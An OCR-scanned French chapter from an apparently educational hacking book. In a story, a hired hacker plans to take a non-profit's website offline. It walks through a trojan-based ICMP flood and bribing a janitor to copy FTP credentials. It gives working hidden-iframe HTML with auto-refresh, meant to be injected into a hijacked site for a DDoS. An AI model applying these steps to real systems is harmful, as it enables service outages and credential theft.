Madison et Wabash !", annonce le haut-parleur du train. Phnix se lve et attend la porte que le train sarrte. Il descend du train, sort de la gare et se dirige rapidement vers le caf mi-chemin du bloc. Il regarde sa montre, 17 h 30. "Belle synchronisation", pense Phnix.

64

Chanes dexploits

Lorsquil entre dans le caf, il parcourt la salle du regard et constate que M. Dobbs nest pas en vue. Au moment o Phnix envisage den proter pour dtaler, un homme assis dans un coin linterpelle : "Hep, gamin, viens voir ici une minute." Phnix sapproche de lhomme et lui demande sil peut laider. "Oui, Dobbs ma parl de toi." Phnix rpond : "Je ne sais pas de qui ou de quoi vous parlez, monsieur." Lhomme regarde Phnix et lui dit dun ton svre : "Dobbs ma dit que tu serais peut-tre un peu nerveux, mais il ma dit de te dire que lherbe du 5638 Cherry Street avait vraiment besoin dtre tondue quel que soit le sens de cette phrase", ajoute-t-il en haussant les paules. Phnix sent un frisson familier lui parcourir lchine et sa bouche sasscher compltement. Il sait fort bien ce que cela signie et prend conscience que M. Dobbs a bel et bien envoy cet homme. De ce fait, Phnix sassied de lautre ct de la table et demande, hsitant : "De quoi avez-vous besoin ?" Lhomme ne tourne pas autour du pot. "Mon client est une entreprise de commerce lectronique qui vend des pices et des priphriques informatiques en ligne. Ses bnces slvent environ neuf milliards de dollars par an. Une entit but non lucratif dintrt public va rvler des informations prjudiciables mon client dans huit jours. Nous avons quelquun en place lintrieur de lentit pour faire licencier la personne qui a sorti ces informations. ce moment-l, ce ne sera plus un problme. Mais il faut que le site web de lentit soit en panne ou inaccessible ce jour-l. Il faut que ce soit le cas sufsamment longtemps pour que le march boursier ferme et que les changes soient termins. Les informations publies pourraient effrayer les investisseurs et avoir des effets dvastateurs sur le prix de notre action. Le site doit tre en panne ce jour-l seulement : nous publions nos rsultats trimestriels le lendemain. Mon client ne veut donc pas que les actions scroulent la veille de la publication des rsultats." Lhomme se tait et attend une rponse de Phnix. "Vous voulez que je fasse tomber le site web pour une journe ? demande Phnix. Oui, rpond lhomme. Que penseriez-vous de le dfacer ? Non, nous voulons juste que le site ait lair de rencontrer des difcults techniques. Nous savons que lorganisation est mal nance. Nous supposons donc quelle hberge elle-mme son site web et que sa bande passante est rduite." Phnix rchit une seconde, puis rpond : "OK, quel est le nom de lorganisation ?"

Chapitre 3

Faire planter le site web de votre concurrent

65

Sans tarder, lhomme pose une grosse enveloppe marron sur la table et rpond : "Tout ce dont vous avez besoin se trouve dans cette enveloppe. Je ne me fais pas de souci quant votre russite. Dobbs ma dit que vous tiez dou, et il ma dit de vous faire savoir quil se chargerait personnellement de vous en cas dchec. Lenveloppe contient, en plus de toute la documentation dont vous pourriez avoir besoin, 5 000 en liquide. Je vous donne rendez-vous ici la mme heure le jour de lattaque pour le solde du paiement, qui slve 50 000 supplmentaires." Avant que Phnix ne puisse prononcer le mot "OK", lhomme se lve et se dirige vers la porte. En rentrant chez lui, Phnix rchit divers scnarios et se remmore diverses techniques pour faire tomber un site web. Il ne se proccupe pas de lenveloppe avant douvrir la porte de son appartement. Phnix entre dans son salon et saffale sur le canap. Il dchire le scotch qui scelle lenveloppe et louvre. La premire page est un tirage papier des dtails propos de la cible. Phnix ricane en lisant le nom de lentreprise : Vrit. "Quelle originalit", se dit-il voix haute. Il se lve, attrape lenveloppe, va son bureau et visite le site web de lentreprise. Il saisit www.veritesa.org dans son navigateur et obtient la page illustre la Figure 3.1.

Figure 3.1
Aperu du site www.veritesa.org.

66

Chanes dexploits

La premire chose que Phnix remarque est le pitre aspect du site web. Il dcide de faire une petite reconnaissance sur lorganisation. Grce Google, il trouve rapidement un article expliquant que lassociation a con la ralisation de son site web des lycens dsireux de gagner de lexprience. "Hum, se dit Phnix, je parie que la scurit ntait pas au cur de la conception et que lorganisation na quune bande passante limite". Phnix place un signet sur la page, se lve et va se coucher.

Approche
Phnix va utiliser de nombreuses techniques pour faire tomber sa cible. Voici un rsum de ce quil va mettre en uvre pour arriver ses ns : 1. trouver un rseau sans-l non protg pour se connecter pendant son attaque ; 2. utiliser un service anonymisant pour couvrir ses traces ; 3. construire une attaque par DDoS (Distributed Denial of Service, dni de service distribu) grce loutil de DDos Freak88 ; 4. tester loutil dans un environnement de test ; 5. infecter des ordinateurs non protgs avec le cheval de Troie server.exe de Freak88 ; 6. prendre contrle des machines infectes et leur ordonner de lancer des requtes ping continues sur le site cible. Phnix peut commencer mettre en place son attaque. Comme dhabitude, il commence par vrier la faisabilit de son attaque avant de la lancer. Phnix, de nature paranoaque, dteste les surprises et aime tester les choses avant de les lcher dans la nature. Alors quil rchit aux outils quil pourrait utiliser, il se rappelle un outil de DDoS nomm Freak88. "a vaut le coup dessayer", se dit-il. Il cherche le terme "Freak88" sur Google et rcupre environ 10 000 rsultats. Il commence les parcourir : aprs avoir suivi quatre liens, Phnix tombe sur ce qui semble tre un lien de tlchargement de loutil, sur lequel il clique. Il dcompresse le chier quil a tlcharg et en regarde le contenu, illustr la Figure 3.2.

Chapitre 3

Faire planter le site web de votre concurrent

67

Figure 3.2
Contenu de larchive Freak88 : le serveur, le client et la DLL ncessaire.

Pour plus dinformations


Daprs un rapport publi par Microsoft le 22 avril 2008, les pirates ont commenc dlaisser les attaques par hameonnage au moyen de courriers lectroniques au prot dattaques bases sur le web. Comme les administrateurs systme russissent de plus en plus bloquer le contenu malveillant des courriers lectroniques et de leurs pices jointes, les pirates ont plus de succs avec les attaques bases sur le web telles que le crosssite scripting, les injections SQL et autres types dattaques. Un type dattaque dont on parle peu est la vulnrabilit induite par les mcanismes tels que les cadres intgrs (inline frames ou iframes), les feuilles CSS et les autres fonctionnalits autorises tre insres sans discrimination dans notre environnement. Un des gros problmes de la scurit web est le fait que nous permettons tout et nimporte quoi datterrir dans les sites web "riches" et que nous appelons toujours cela du HTML. En 2007 et jusqu prsent en 2009, plusieurs vulnrabilits touchant les cadres intgrs ont t dcouvertes.

68

Chanes dexploits

Le comportement par dfaut des cadres intgrs a plusieurs problmes fondamentaux, mais le plus important est la manire dont la plupart des navigateurs web populaires les grent par dfaut. De plus en plus dentreprises font de leur site web leur interface premire avec le monde extrieur ; nous pouvons donc nous attendre ce que les attaques visant les sites web dentreprises, de gouvernements et de personnes prives deviennent de plus en plus nombreuses et de plus en plus complexes. Phnix va tenter dutiliser divers outils de DDoS qui font appel des mcanismes comme lICMP (Internet Control Message Protocol) pour faire tomber sa cible. Le principe en est simple : envoyer le plus possible de requtes ping depuis diffrentes sources et diffrents htes et faire tomber le site sous la charge des requtes ping echo (auxquelles, selon le protocole, le site doit rpondre par des rponses echo). Comme beaucoup dadministrateurs et dingnieurs rseau ont mis un frein de nombreuses attaques de ce type en interdisant le transport de ce protocole, les attaques par ICMP deviennent moins efcaces. Phnix rencontrera sans doute ce problme, mais il utilisera des fonctions du langage HTML pour obtenir le mme rsultat.

Chane dexploits
Cette section dtaille chaque tape de la chane dexploits de Phnix, y compris :
m m m m m m

attaque n 1 : le test ; attaque n 2 : lattaque qui fonctionne ; accder au site web intermdiaire ; tester lattaque dans un environnement contrl ; modier le site web intermdiaire ; autres possibilits.

Attaque n 1 : le test Phnix commence immdiatement tudier Freak88 et la manire dont il est utilis. "Bon, serveur.exe doit tre sur les machines que je contrle et que jutilise pour lancer les requtes. Ma machine nenverra elle-mme aucune requte ICMP. Sympa ! Et jutiliserai clienttrino.exe pour contrler les machines sur lesquelles jaurai mis le cheval de Troie server.exe. Cest bon, cest clair." Maintenant que Phnix comprend comment les outils sont censs fonctionner, il prpare son environnement de test.

Chapitre 3

Faire planter le site web de votre concurrent

69

Il cre dabord un diagramme illustrant comment lattaque et sa mise en place sont supposes fonctionner, comme le montre la Figure 3.3.

L'attaquant ordonne au zombi d'envoyer des requtes ping la victime.

Attaquant 10.0.0.5

Zombi 10.0.0.34

Le zombi s'excute et envoie un flux continu de paquets de requtes ICMP echo.

Victime 10.0.0.32

Figure 3.3
Logistique de lattaque propose.

Phnix dmarre quelques machines de test et se met au travail en installant les morceaux du cheval de Troie sur ses ordinateurs de test. Il copie le chier server.exe sur la machine ayant ladresse 10.0.0.34. Il sagit du zombi ou du pion qui lancera effectivement les requtes. Phnix installe et dmarre Wireshark sur la machine qui fera ofce de victime. Dans le menu de Wireshark, il choisit Capture > Capture Filters, comme illustr la Figure 3.4.

70

Chanes dexploits

Figure 3.4
Filtre de capture de Wireshark.

Dans la bote de dialogue qui souvre, Phnix saisit ICMP dans le champ Filter name et icmp only dans le champ Filter string. Il clique ensuite sur le bouton New. Le nouveau ltre ICMP apparat maintenant dans la liste de choix des ltres, comme le montre la Figure 3.5. Puis Phnix se connecte lordinateur qui lui servira de zombi. Il y trouve le chier server.exe quil a copi sur le disque C: et double-clique dessus. Il retourne la machine attaquante et double-clique sur clienttrino.exe. La fentre illustre la Figure 3.6 safche immdiatement. Phnix saisit les adresses IP correspondantes dans les champs de la bote de dialogue, comme le montre la Figure 3.7. Dans le champ ip of infected computer, il saisit ladresse 10.0.0.34. Dans le champ ip of machine to attack, il saisit ladresse 10.0.0.32. Une fois loutil congur de cette manire, Phnix clique sur le bouton Connect. Un message lui indique quil est connect : "Hello, who do you want to phuk today ?"

Chapitre 3

Faire planter le site web de votre concurrent

71

Figure 3.5
Wireshark crer un nouveau ltre.

Figure 3.6
Client ou interface de contrle de Freak88.

72

Chanes dexploits

Une des machines lanant les requtes ping La cible ou victime

Figure 3.7
Interface du client de Freak88 aprs avoir saisi les bonnes adresses IP et cliqu sur Connect.

Phnix se connecte la machine cible et ouvre la fentre de Wireshark. Il clique sur le menu Capture > Interfaces (voir Figure 3.8).

Figure 3.8
Dmarrer la capture Wireshark sur la machine de la victime.

Chapitre 3

Faire planter le site web de votre concurrent

73

Phnix clique ensuite sur le bouton Start droite de la bonne interface, dont ladresse IP est 10.0.0.32. La fentre de capture sactive et commence afcher tout le trac entrant et sortant de la carte rseau, comme le montre la Figure 3.9. Phnix saisit dans le champ Filter les caractres icmp (soit le nom du ltre quil a dni quelques minutes auparavant).

Figure 3.9
Wireshark avant lapplication du ltre.

Puis Phnix clique sur le bouton Apply droite de la zone du champ Filtre. Tout le trac captur disparat, comme le montre la Figure 3.10. Une fois la capture de paquets et le ltrage congurs, Phnix peut lancer sa simulation dattaque. Il retourne la machine correspondante. Dans la bote de dialogue de Freak88 sur la machine attaquante, Phnix clique sur le bouton Takeumout (voir Figure 3.11).

74

Chanes dexploits

Figure 3.10
Wireshark, une fois le ltre ICMP activ.

Figure 3.11
Client ou interface de contrle de Freak88, une fois lattaque lance.

"Cest exactement ce dont jai besoin", se dit Phnix en traversant la pice pour aller voir si lordinateur cible capture du trac ICMP. Phnix regarde lcran et claque les

Chapitre 3

Faire planter le site web de votre concurrent

75

doigts, approbateur. "a marche", dit-il. Comme prvu, le trac provient du zombi ladresse 10.0.0.34, et non de sa machine (voir Figure 3.12).

Figure 3.12
Wireshark voit le trac provenant de lordinateur zombi.

"Excellent ! sexclame Phnix. Jattaque la machine par ping en ordonnant une autre machine deffectuer les requtes." Sur un pressentiment, Phnix dcide de voir sil peut envoyer des requtes ping au site web quil veut attaquer. Il dmarre une ligne de commande et tape ce qui suit :
ping www.veritesa.org Dlai dattente de la demande dpass. Dlai dattente de la demande dpass. Dlai dattente de la demande dpass. Dlai dattente de la demande dpass.

Phnix est abasourdi par ce rsultat. Il pointe alors son navigateur vers le site web et voit quil fonctionne parfaitement. "Quest-ce que cest que ce bazar ?" crie-t-il.

76

Chanes dexploits

Sa bonne humeur commence svaporer. Il navait pas ni de lire larticle sur la cration et la conguration du site web. Il reprend larticle et seffondre lorsquil lit que les lycens ont mis en place un pare-feu PIX (Private Internet Exchange, un pare-feu Cisco) et quils ont, sur les conseils de Cisco, dsactiv lICMP pour le serveur web. "Bon sang !" hurle Phnix. Il vient de prendre conscience que son attaque ne fonctionnera pas. Il sassied et rchit. "Ce nest pas le moment de snerver, je dois trouver une autre mthode", se dit-il. ce moment, il se souvient avoir lu un article sur des pirates utilisant des cadres intgrs (inline frames) pour lancer des attaques par DDoS en faisant excuter aux cadres intgrs des requtes HTTP GET (HyperText Transfer Protocol) normales vers des sites web. Les attaquants prennent le contrle de sites web populaires et placent des iframes sur ces sites. Suite cela, chaque visiteur du site sera un participant involontaire lattaque DDoS. Le concept en est simple. Si un site a cent visiteurs par minute et si les cadres intgrs demandent au navigateur du visiteur de charger dix fois le site cible, ce dernier recevra dix visites par visiteur du site hte. Multipliez cela par cent et cela fait mille visites par minute. "a pourrait marcher. Si je pouvais dire aux iframes de non seulement charger le site, mais aussi de le rafrachir en permanence, cela augmenterait le trac vers ma cible de manire exponentielle. a vaut le coup dessayer", se dit-il. Attaque n 2 : lattaque qui fonctionne Sans attendre, Phnix met en place les tapes de son nouveau plan : 1. trouver une entreprise dont le site web a beaucoup de trac et beaucoup de bande passante ; 2. pntrer par ingnierie sociale dans lentreprise de conception qui a un accs en criture la page principale du site ; 3. aprs avoir obtenu un accs ce site haut trac, modier sa page principale et y insrer des cadres intgrs HTML qui appelleront le site cible (www.veritesa.org) ; 4. sinstaller et regarder veritesa.org se faire anantir par une norme quantit de trac provenant dutilisateurs du monde entier. Phnix dcide de faire un graphique pour clarier le concept dans son esprit. Aprs dix minutes sous Visio, il a produit lillustration prsente la Figure 3.13.

Chapitre 3

Faire planter le site web de votre concurrent

77

Le serveur hbergeant la page infecte a des milliers de visiteurs par heure et chaque visiteur effectuera dix connexions HTTP son insu la cible, tout en rafrachissant chaque connexion toutes les 5 secondes. L'infrastructure cible n'tant pas conue pour ce type de trafic, le dni de service est invitable.

x 10

x 10

x 10
x 10

x 10
x 10

Site web cible (www.veritesa.org)

0 x1

Serveur web hbergeant la page qui facilitera l'attaque. Hberge une page qui a des cadres intgrs lanant des requtes HTTP multiples vers la cible (www.toutpourlordi.com).

Figure 3.13
Illustration du plan dattaque de Phnix.

Phnix choisit toutpourlordi.com car ils se attent dobtenir normment de trac en provenance de leurs publicits et quils gagnent des millions par an en ventes depuis leur site web. De plus, le site prsente un logo en bas de sa page indiquant quil est "conu et maintenu par bebop web". Phnix sait que cette entreprise de conception web est en fait de petite taille, malgr quelques gros portefeuilles. Il sait aussi quil sagit dune entreprise locale. Il dcide que la meilleure approche, pour commencer, est damener quelquun chez Bebop Web Design lui communiquer les informations de connexion pour modier le site web toutpourlordi.com. Phnix commence ses recherches sur Bebop Web Design et trouve rapidement ladresse de leurs bureaux. Il imprime les instructions MapQuest que Bebop a sur son site web et se prpare rendre visite lentreprise.

78

Chanes dexploits

Accder au site web intermdiaire En arrivant ladresse de Bebop, Phnix est impressionn par le style du btiment et sa taille. "Une petite bote de conception web peut se permettre a ?" pense-t-il. Il entre dans le btiment et cherche la liste des entreprises du btiment. Il la trouve au milieu du hall. "Bebop Web Design, suite 208", lit-il voix haute. Il monte dans le premier ascenseur disponible. Dans lascenseur, un homme plus g avec un badge nominatif et un uniforme bleu et marron le salue : "Bonjour." "Bonjour", rpond Phnix. Lhomme entame la conversation : "Je mappelle Greg. Je suis le gardien de limmeuble. Je vais vous donner ma carte : je travaille aussi en tant que jardinier, je lave les voitures, tout a." Lhomme offre Phnix une carte faite maison de mauvaise qualit. Phnix la range dans sa poche. "Vous tes un homme tout faire", plaisante Phnix. Avec un lger sourire, lhomme rpond : "Ben, lconomie tant ce quelle est, on ne peut plus faire dheures supplmentaires, mais il faut bien manger." "a se comprend", dit Phnix. Sur ce commentaire, lascenseur met un "ding" et sarrte au deuxime tage. Phnix sort et souhaite une bonne journe au gardien. Au moment o les portes se referment, celui-ci appelle Phnix : "Noubliez pas de mappeler si vous avez besoin de quelquun pour un peu de jardinage ou de bricolage !" Phnix acquiesce et se dirige vers la suite 208. Lorsquil entre dans la suite, une jolie femme dune vingtaine dannes le salue et lui demande si elle peut lui tre utile. "Oui, rpond Phnix. Je suis propritaire dune entreprise multimillionnaire et nous cherchons actuellement une entreprise de design web pour diriger, dun point de vue conception, le dmarrage de notre site de commerce lectronique." Phnix, dont les cheveux sont frachement coups et qui porte un costume neuf, ressemble vraiment un jeune cadre qui vient de lancer une entreprise en pleine russite.

Chapitre 3

Faire planter le site web de votre concurrent

79

"Nous pouvons vous aider. Asseyez-vous, je vais appeler notre directeur cratif", rpond la rceptionniste, avec un grand sourire et un dsir visiblement accru de laider. "Impressionnant, ce que peut faire largent", marmonne Phnix. peine quelques minutes plus tard, un homme corpulent denviron 35 ans, habill de manire dcontracte, sort et propose Phnix dentrer dans son bureau. Aprs avoir offert Phnix un caf ou un rafrachissement, il sassied et entame la conversation. "Mlodie ma parl rapidement de votre projet, mais nous ne grons pas nous-mmes le commerce lectronique. Nous nous chargeons de crer une jolie interface et nous avons un partenariat avec une autre entreprise pour les fonctionnalits de commerce lectronique." "Je vois", rpond Phnix en feignant dcrire dans un bloc-notes. Dun ton professionnel, il demande : "Parlez-moi de votre process." Lhomme sourit et commence expliquer : "Comme je vous lai dit, nous ne nous occupons que de linterface, et pour cela nous faisons partie des meilleurs. Je peux vous montrer des exemples de nos travaux, si vous le souhaitez." "Bien sr, dit Phnix, mais ce qui me proccupe le plus cest le temps de rponse. En dautres termes, si nous appelons avec une demande de changement, quel est votre processus ?" demande Phnix. "OK, rpond lhomme, qui sest entre-temps prsent sous le nom de Benot. Vous avez de la chance, jai reu une demande de changement juste avant que vous nentriez. Vous allez pouvoir voir le process directement." Avec un sourire pensif, Phnix rpond : "a serait parfait." Lhomme tire un classeur rouge trois anneaux et commence tourner les pages. Benot regarde Phnix et lui explique quil range toutes les informations de connexion des sites web de ses clients dans ce classeur. Il nenregistre rien sous forme lectronique pour que les pirates ne puissent jamais y avoir accs. "Daccord", acquiesce Phnix. Lorsque Benot arrive la page contenant les accs au site web quil sapprte modier, il sarrte et lance un client FTP. En quelques minutes, il est connect, rcupre le chier HTML de la page principale, fait la modication demande et enregistre le chier.

80

Chanes dexploits

Il regarde Phnix et commente : "Vous voyez, cest tout ce quil faut faire. a ma pris, quoi, deux minutes ?" Phnix hoche la tte et sexclame faussement : "Cest trs impressionnant." Benot range le classeur dans le placard derrire son bureau et le ferme. "Bien, je crois que vous mavez convaincu, dit Phnix. Je vous contacterai, vous ou un de vos collgues, dici quelques jours pour que nous mettions en place tout cela." Phnix se lve pendant que Benot lui explique quil est le seul concepteur de lentreprise. "a me va, dit Phnix, je vous contacterai directement, dans ce cas. Avez-vous une carte de visite ?" Benot offre quelques cartes Phnix et le raccompagne la porte. "Merci encore", dit Phnix en montant dans lascenseur. Avant mme davoir atteint lascenseur, son cerveau stait dj mis en qute dun moyen de rcuprer le classeur dans le placard derrire le bureau de Benot. Ce classeur contient tous les accs FTP des sites web des clients de Bebop. En arrivant dans le hall, il aperoit Greg, le gardien. Sans y rchir deux fois, Phnix attire lattention de Greg et lui demande de laccompagner dehors. En arrivant dans la rue, Phnix attaque directement : "Greg, a vous plairait de vous faire 3 000 en 10 minutes ?" Greg sourit et rpond : "Vous connaissez beaucoup de gens qui refuseraient de gagner autant en dix minutes ?". Phnix lui renvoie son sourire et demande : "Vous travaillez au deuxime tage ?" Greg hoche la tte et rpond : "Ouais, je gre tout le btiment." Phnix rchit une seconde : "Bien. Dans ce cas, vous connaissez Bebop Web Design au deuxime tage ?" Greg sourit et dit : "Oui, cest ce type qui sy croit trop, Benot, qui gre la bote." Phnix marque une pause et pose une autre question Greg : "a vous arrive de nettoyer les bureaux la nuit ou lorsque tout le monde est parti ?" Greg rpond immdiatement : "Oui, une fois par semaine. Ce soir, par exemple, il faut que je nettoie la moquette de tous les tages qui en ont, donc il faut que je fasse a la nuit."

Chapitre 3

Faire planter le site web de votre concurrent

81

Phnix regarde Greg dans les yeux et lui explique ce quil attend de lui : "Ce soir, quand vous nettoierez, vous devrez simplement rcuprer le classeur rouge trois anneaux derrire le bureau de Benot et faire une copie de toutes les pages il doit y avoir 20 pages environ. Ensuite, rangez le classeur et appelez-moi en quittant le btiment. Vous mapporterez les photocopies et je vous donnerai 3 000 en liquide." Greg accepte immdiatement. Ils changent leurs numros de tlphone et se sparent. Comme Greg rencontre des difcults nancires et que la situation conomique nest pas brillante, il nhsite pas effectuer cette petite besogne. Six heures plus tard, vers 21 h 30, le tlphone portable de Phnix sonne. Quand il rpond, Phnix est heureux dentendre Greg lautre bout du l. "Jai ce que vous vouliez", dit Greg. "Cool !" sexclame Phnix. "Rendez-vous au Jacks Ribs au croisement Adams et State dans vingt minutes." Greg accepte et raccroche. Phnix se prcipite la porte et va au restaurant. Greg et lui changent lenveloppe contre largent. Phnix dcide de rentrer la maison, mais Greg dcide de rester et de dguster des ribs. Phnix remercie Greg une fois de plus et sort. Tester lattaque dans un environnement contrl Comme les pirates et pentesteurs les plus brillants le savent, il est important de tester dans un environnement contrl toute attaque que vous navez jamais mise en uvre. Il est compltement stupide de dcouvrir lattaque une fois en place. Si un pirate se retrouve dans cette situation, il na probablement pas assez prpar son coup. Une fois chez lui, Phnix sassied son bureau et commence travailler sur les aspects techniques ncessaires au succs de son attaque. "Je dois dabord tester tout a." Sur cette rexion, Phnix sinstalle une de ses machines de test sous Windows 2003 Server. Il ouvre le Bloc-notes et cre une simple page HTML afchant le message "Pirat". Phnix enregistre ensuite la page sous C:\inetpub\wwwroot\pirate.html.

82

Chanes dexploits

Puis il commence la conguration dIIS (Microsofts Internet Information Services, services dinformation Internet de Microsoft) pour hberger sa page. Il lance ensuite Dmarrer > Outils dadministration > Gestionnaire des services Internet (IIS), comme le montre la Figure 3.14.

Figure 3.14
Dmarrer la conguration dIIS pour crer un site web de test.

Phnix clique sur le symbole + gauche du nom de son serveur. Il fait ensuite de mme pour licne Site web par dfaut situe en dessous, comme le montre la Figure 3.15.

Chapitre 3

Faire planter le site web de votre concurrent

83

Figure 3.15
Vue du site web par dfaut.

Phnix clique du bouton droit sur licne Site web par dfaut et clique ensuite sur Proprits. Dans la bote de dialogue qui safche, Phnix clique sur longlet Documents. Puis il clique sur le bouton Ajouter et saisit le nom du chier HTML quil a enregistr. Il clique alors plusieurs fois sur le bouton Monter jusqu ce que son chier se trouve en tte de la liste, comme lillustre la Figure 3.16. Phnix clique ensuite sur longlet Scurit de rpertoire et clique sur Modier. Dans la bote de dialogue qui safche, Phnix coche la case Activer la connexion anonyme et laisse tous les autres paramtres leurs valeurs par dfaut, comme le montre la Figure 3.17.

84

Chanes dexploits

Figure 3.16
Congurer une page HTML comme page par dfaut du site web.

Figure 3.17
Congurer le site web pour la navigation anonyme.

Chapitre 3

Faire planter le site web de votre concurrent

85

Phnix sassure alors que le site web par dfaut est dmarr et se connecte un autre ordinateur pour voir sil peut se connecter au site web en saisissant ladresse IP du serveur sous Windows 2003 Server. Il est content dtre accueilli par son message "Pirat", comme le montre la Figure 3.18.

Figure 3.18
Navigation sur le site web de test.

"Passons la partie amusante, se dit Phnix. Je dois en apprendre un peu plus sur les cadres intgrs si je veux que a marche." Il dmarre Firefox et saisit www.google.com. Il cherche des informations sur le fonctionnement des cadres intgrs. Aprs plusieurs heures de lecture de tutoriaux et de forums, Phnix pense quil comprend bien les cadres intgrs. Il va donc travailler sur sa page de test. Il ouvre sa page pirate.html

86

Chanes dexploits

sous Notepad et commence construire son premier cadre intgr. Il commence par intgrer le code suivant dans le document HTML :
<iframe src=http://www.sitedephenix.com width=200 height=200> </iframe>

Phnix tudie le code quil a saisi. Il rchit : "Sur la base de ce code, quand jouvre ma page pirate.html, elle devrait ouvrir des cadres intgrs, qui sont des minipages web dans le chier pirate.html. Chaque minipage web sera une instance unique de www.sitedephenix.com. En ouvrant pirate.html, jouvrirai donc dix instances de mon site, chacune avec une hauteur et une largeur de 200." Il va alors tester sa page web ladresse http://10.10.10.32 (ladresse IP de son serveur de test), comme le montre la Figure 3.19.

Figure 3.19
Rsultat du cadre intgr sil est cod correctement.

Phnix examine le code aprs avoir coll le code des cadres intgrs dans le document neuf fois de plus :
<html> <head> <meta http-equiv="Content-Language" content="fr-fr"> <meta http-equiv="Content-Type" content="text/html; charset=windows1252">

Chapitre 3

Faire planter le site web de votre concurrent

87

<title>PIRAT</title> </head> <body> <p><b><font size="6" color="#000080">PIRAT</font></b></p> <p>&nbsp;</p> <p><b><font size="6" color="#000080">PIRAT</font></b></p> <p>&nbsp;</p> <p><b><font size="6" color="#000080">PIRAT</font></b></p> <p>&nbsp;</p> <html> <head> <meta http-equiv="refresh" content="20"> </head> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com

88

Chanes dexploits

width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> <iframe src=http://www.sitedephenix.com width=200 height=200> </iframe> </html> </body></html>

"Bien, voyons si les dix instances sont ouvertes maintenant." Phnix enregistre le chier pirate.html en passant par Fichier > Enregistrer. Il retourne alors son navigateur web et clique sur le bouton Rafrachir. Il est ravi de voir le rsultat illustr la Figure 3.20.

Figure 3.20
Cadres intgrs HTML vus dans Internet Explorer. Remarquez les dix instances du site web charges.

Chapitre 3

Faire planter le site web de votre concurrent

89

"Trop cool !" hurle Phnix. "Afnons un peu cela. Je dois voir comment faire recharger les cadres intgrs toutes les cinq secondes." ce moment, Phnix se rend compte quil na pas lu sufsamment. Il retourne sur Google et lance quelques recherches propos du rafrachissement diframes. Il trouve rapidement ce quil cherche. Sur la base dun article quil a trouv dans une publication en ligne pour dveloppeurs web, il modie ses cadres intgrs en rouvrant son document pirate.html dans le Bloc-notes. Il ajoute alors la balise meta suivante pour rafrachir les cadres intgrs toutes les cinq secondes :
<html> <head> <meta http-equiv="refresh" content="5"> </head>

Phnix enregistre son document HTML, retourne son navigateur web et rafrachit la page pirate.html qui est toujours charge. Au dbut, rien ne se passe, part le rafrachissement des cadres intgrs. Mais, avec la prcision dune horloge, les cadres se rafrachissent au bout de cinq secondes. Et, cinq secondes plus tard, ils se rafrachissent nouveau. "a devrait marcher comme sur des roulettes !" laisse chapper Phnix en se flicitant. Mais il ralise soudain que mme les utilisateurs les moins verss informatiquement parlant sauront que quelque chose nest pas normal si une page web cense prsenter des ordinateurs et des pices a de nombreuses instances dun autre site web qui se chargent au milieu de la page. "Je dois trouver un moyen de cacher ces cadres", pense Phnix. Il teste la premire mthode qui lui vient lesprit. Il rouvre pirate.html sous Notepad et modie la hauteur et la largeur de chaque cadre. Il passe la hauteur et la largeur 0 et laisse le reste inchang :
<iframe src=http://www.sitedephenix.com width=0 height=0> </iframe>

Aprs avoir sauv ses changements, Phnix retourne son navigateur et rafrachit la page web. Lopration lui semble couronne de succs : la page se charge et nafche aucun signe des cadres intgrs, comme le montre la Figure 3.21. Phnix ne peut pas voir si les cadres se chargent puisquils sont cachs. "Regardons le trac dans Wireshark", se dit-il. Phnix ouvre Wireshark, commence la capture sur sa carte rseau et voit immdiatement les requtes HTTP GET vers ladresse IP de son site, comme le montre la Figure 3.22.

90

Chanes dexploits

Figure 3.21
Fichier HTML charg avec les cadres intgrs cachs.

Requte HTTP vers le site de Phnix

Figure 3.22
Wireshark montre que les cadres intgrs se chargent toujours mme si cela est invisible sur le navigateur.

Phnix sarrte et rchit un peu. "Comment cela va-t-il fonctionner dans le cas rel ?" se demande-t-il. "Cinq instances pourraient tre insufsantes hum. Mouais, je pourrais mme mettre cent instances si je voulais ! Mais cela risque de faire planter lutilisateur nal. En fait, je pense quavec dix instances, a devrait marcher. En plus, cent instances risqueraient de dclencher une alarme du ct du site web distant ou sur le rseau dune personne dmarrant cent connexions dun coup sur un mme site.

Chapitre 3

Faire planter le site web de votre concurrent

91

Mais bon, il mest dj arriv de chercher une dizaine de trucs la fois sur Google, donc dix devraient passer." Phnix poursuit son monologue pendant une dizaine de minutes avant de dcider de laisser le nombre de cadres intgrs dix. Modier le site web intermdiaire ce stade, Phnix a test tout ce quil pouvait tester. Il est maintenant temps de se connecter au serveur web qui hberge www.toutpourlordi.com et de modier sa page principale. Voici les tapes que Phnix suit pour cela :
m m

se connecter www.toutpourlordi.com et copier la page principale ; grce au Bloc-notes, insrer des cadres intgrs au HTML de la page principale de toutpourlordi.com. Les cadres intgrs appellent www.veritesa.org plutt que la page que Phnix a utilise dans ses tests. remplacer la page originale sur le serveur web par la version modie intgrant les iframes ; attendre que www.veritesa.org ne puisse plus servir de requtes HTTP.

Phnix commence par rcuprer une copie du site web intermdiaire. Il ouvre Internet Explorer, se connecte au service danonymiseurs quil utilise et navigue vers www.toutpourlordi.com. Lorsque la page est charge, il clique sur Afchage > Source. Windows ouvre une fentre du Bloc-notes et afche le code source du site web. Phnix commence faire des modications. Phnix ouvre ensuite le chier pirate.html quil a prcdemment utilis pour ses tests. Il modie les liens de www.sitedephenix.com vers www.veritesa.org et copie le texte dnissant liframe. Il le copie dans la version locale du code HTML de www.toutpourlordi.com quil a ouverte dans le Bloc-Notes. Phnix veut tester la page modie en local pour voir ce quoi elle ressemble et pour vrier que les cadres intgrs ne safchent pas. Il enregistre sa version de www.toutpourlordi.com sur son bureau. Une fois le chier sauv, Phnix double-clique dessus. Internet Explorer ouvre une nouvelle fentre et lui montre la page illustre la Figure 3.23. Lespace dun instant, Phnix panique en voyant tous les X rouges sur lcran la place des images. Mais il se tape le front rapidement et se rappelle : "Zen, Phnix. Ces images ne sont pas sur ton disque local." Les cadres intgrs ne safchent nulle part. Il lance une autre session de capture sous Wireshark ; les requtes HTTP sont bien diriges vers www.veritesa.org.

92

Chanes dexploits

Figure 3.23
Internet Explorer afche une copie locale du site web www.toutpourlordi.com modi.

